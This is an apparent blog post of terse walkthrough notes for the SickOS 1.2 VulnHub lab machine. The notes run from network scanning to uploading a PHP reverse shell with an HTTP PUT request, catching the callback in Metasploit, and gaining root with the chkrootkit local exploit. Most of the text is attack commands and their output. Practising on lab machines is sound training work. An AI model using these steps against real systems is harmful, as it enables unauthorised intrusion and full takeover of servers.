SickOS
netdiscover -r 123.123.123.0/24
123.123.123.104 00:0c:29:16:48:56 1 60 VMware, Inc.
nmap -T4 -A -v 123.123.123.104
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 66:8c:c0:f2:85:7c:6c:c0:f6:ab:7d:48:04:81:c2:d4 (DSA)
| 2048 ba:86:f5:ee:cc:83:df:a6:3f:fd:c1:34:bb:7e:62:ab (RSA)
|_ 256 a1:6c:fa:18:da:57:1d:33:2c:52:e4:ec:97:e2:9e:af (ECDSA)
80/tcp open http lighttpd 1.4.28
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: lighttpd/1.4.28
|_http-title: Site doesn't have a title (text/html).
MAC Address: 00:0C:29:16:48:56 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 4.8, Linux 3.2 - 4.8, Linux 4.4
Uptime guess: 0.001 days (since Mon Oct 1 19:55:13 2018)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=259 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
root@KaliLNX:~# dirb http://123.123.123.104/
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Mon Oct 1 22:20:20 2018
URL_BASE: http://123.123.123.104/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://123.123.123.104/ ----
+ http://123.123.123.104/index.php (CODE:200|SIZE:163)
==> DIRECTORY: http://123.123.123.104/test/
---- Entering directory: http://123.123.123.104/test/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Mon Oct 1 22:20:32 2018
DOWNLOADED: 4612 - FOUND: 1
root@KaliLNX:~#
http://pentestmonkey.net/tools/web-shells/php-reverse-shell
root@KaliLNX:/opt/VMs/SickOS1.2# wget http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz
vim php-reverse-shell.php
$ip = '123.123.123.201'; // CHANGE THIS
$port = 443; // CHANGE THIS
mv php-reverse-shell.php php-reverse-shell.txt
curl --upload-file php-reverse-shell.txt -v --url http://123.123.123.104/test/reverse_shell.php -0 --http1.0
root@KaliLNX:/opt/VMs/SickOS1.2/php-reverse-shell-1.0# curl --upload-file php-reverse-shell.txt -v --url http://123.123.123.104/test/reverse_shell.php -0 --http1.0
* Trying 123.123.123.104...
* TCP_NODELAY set
* Connected to 123.123.123.104 (123.123.123.104) port 80 (#0)
> PUT /test/reverse_shell.php HTTP/1.0
> Host: 123.123.123.104
> User-Agent: curl/7.56.1
> Accept: */*
> Content-Length: 5496
>
* We are completely uploaded and fine
* HTTP 1.0, assume close after body
< HTTP/1.0 201 Created
< Content-Length: 0
< Connection: close
< Date: Mon, 01 Oct 2018 22:27:34 GMT
< Server: lighttpd/1.4.28
<
* Closing connection 0
root@KaliLNX:/opt/VMs/SickOS1.2/php-reverse-shell-1.0#
* On Kali:
msf > use exploit/multi/handler
msf exploit(handler) > set lport 443
lport => 443
msf exploit(handler) > set lhost 123.123.123.201
lhost => 123.123.123.201
msf exploit(handler) > set payload linux/x86/shell_reverse_tcp
payload => linux/x86/shell_reverse_tcp
msf exploit(handler) > run
[*] Exploit running as background job 0.
[*] Started reverse TCP handler on 123.123.123.201:443
msf exploit(handler) > sessions
Active sessions
===============
No active sessions.
msf exploit(handler) > [*] Command shell session 1 opened (123.123.123.201:443 -> 123.123.123.104:49365) at 2018-10-01 23:46:33 +0700
* Openup a browser:
http://123.123.123.104/test/reverse_shell.php
search chkroot
use exploit/unix/local/chkrootkit
show options
set session 1
set lport 8080
run -j
msf exploit(chkrootkit) > run -j
[*] Exploit running as background job 1.
[!] SESSION may not be compatible with this module.
[*] Started reverse TCP double handler on 123.123.123.201:8080
[!] Rooting depends on the crontab (this could take a while)
msf exploit(chkrootkit) > [*] Payload written to /tmp/update
[*] Waiting for chkrootkit to run via cron...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo kKK6pZ1c6QSe32JH;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "kKK6pZ1c6QSe32JH\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 2 opened (123.123.123.201:8080 -> 123.123.123.104:51812) at 2018-10-01 23:51:11 +0700
[+] Deleted /tmp/update
msf exploit(chkrootkit) >
msf exploit(chkrootkit) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell x86/linux Linux ubuntu 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UT... 123.123.123.201:443 -> 123.123.123.104:49365 (123.123.123.104)
2 shell cmd/unix 123.123.123.201:8080 -> 123.123.123.104:51812 (123.123.123.104)
msf exploit(chkrootkit) >
msf exploit(chkrootkit) > sessions -i 2
[*] Starting interaction with 2...
490848829
lMaCOMyqmSVqZTgrUYjEGZDYkqDyhGwj
true
dmPZMxaMtEYKwWYIpyATixztqbPVBnrA
nFzkcRgjOJmxJNQwYZMkxEtCFYifTxFg
FWEncLXPGatXZjOxRsbXBYoWrhkKFjjF
pwd
/root
id
uid=0(root) gid=0(root) groups=0(root)
ls -l
total 52
-rw-r--r-- 1 root root 39421 Apr 9 2015 304d840d52840689e0ab0af56d6d3a18-chkrootkit-0.49.tar.gz
-r-------- 1 root root 491 Apr 26 2016 7d03aaa2bf93d80040f3f22ec6ad9d5a.txt
drwxr-xr-x 2 john john 4096 Apr 12 2016 chkrootkit-0.49
-rw-r--r-- 1 root root 541 Apr 25 2016 newRule
cat 7d03aaa2bf93d80040f3f22ec6ad9d5a.txt
WoW! If you are viewing this, You have "Sucessfully!!" completed SickOs1.2, the challenge is more focused on elimination of tool in real scenarios where tools can be blocked during an assesment and thereby fooling tester(s), gathering more information about the target using different methods, though while developing many of the tools were limited/completely blocked, to get a feel of Old School and testing it manually.
Thanks for giving this try.
@vulnhub: Thanks for hosting this UP!.
No comments:
Post a Comment